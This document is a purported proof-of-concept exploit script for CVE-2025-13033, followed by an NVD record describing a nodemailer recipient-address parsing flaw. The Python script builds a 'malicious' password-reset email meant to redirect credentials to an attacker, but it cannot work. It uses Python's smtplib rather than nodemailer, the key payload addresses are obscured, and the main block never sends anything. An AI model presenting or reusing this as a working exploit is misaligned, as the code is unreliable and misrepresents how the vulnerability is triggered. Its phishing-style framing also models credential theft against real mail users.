CVE-2025-13033

# CVE-2025-13033 PoC - Email Address Misdirection # This PoC demonstrates how an attacker can exploit the email parsing vulnerability # to redirect emails to an external address import smtplib from email.mime.text import MIMEText from email.header import Header def create_malicious_email(): """ Create a malicious email with spoofed recipient address. The parsing vulnerability causes the email to be sent to the attacker-controlled external address instead of the intended internal recipient. """ # Malicious recipient format that exploits the parsing vulnerability # Format: "[email protected]" <[email protected]> # The parser incorrectly extracts [email protected] as the actual recipient malicious_recipient = '"[email protected]" <[email protected]>' # Attacker-controlled email address that will receive the redirected emails attacker_email = '[email protected]' msg = MIMEText('Sensitive internal data or authentication credentials', 'plain', 'utf-8') msg['From'] = Header('[email protected]') msg['To'] = Header(malicious_recipient) # Exploits the vulnerability msg['Subject'] = Header('Password Reset Request') return msg def send_exploit_email(smtp_server, smtp_port, from_addr, to_addr, msg): """ Send the malicious email through the SMTP server. """ try: with smtplib.SMTP(smtp_server, smtp_port) as server: server.sendmail(from_addr, [to_addr], msg.as_string()) print(f"[+] Malicious email sent successfully") print(f"[+] Target internal address was spoofed") print(f"[+] Email was redirected to attacker: {to_addr}") except Exception as e: print(f"[-] Error sending email: {e}") # Example usage if __name__ == '__main__': msg = create_malicious_email() # In real attack scenario, attacker would send this through target's mail server print("PoC demonstrates email misdirection vulnerability CVE-2025-13033")

{"cve": {"id": "CVE-2025-13033", "sourceIdentifier": "[email protected]", "published": "2025-11-14T20:15:45.957", "lastModified": "2026-05-11T13:16:10.037", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1286"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:15979", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3751", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-13033", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179", "source": "[email protected]"}, {"url": "https://github.com/nodemailer/nodemailer", "source": "[email protected]"}, {"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626", "source": "[email protected]"}, {"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87", "source": "[email protected]"}]}}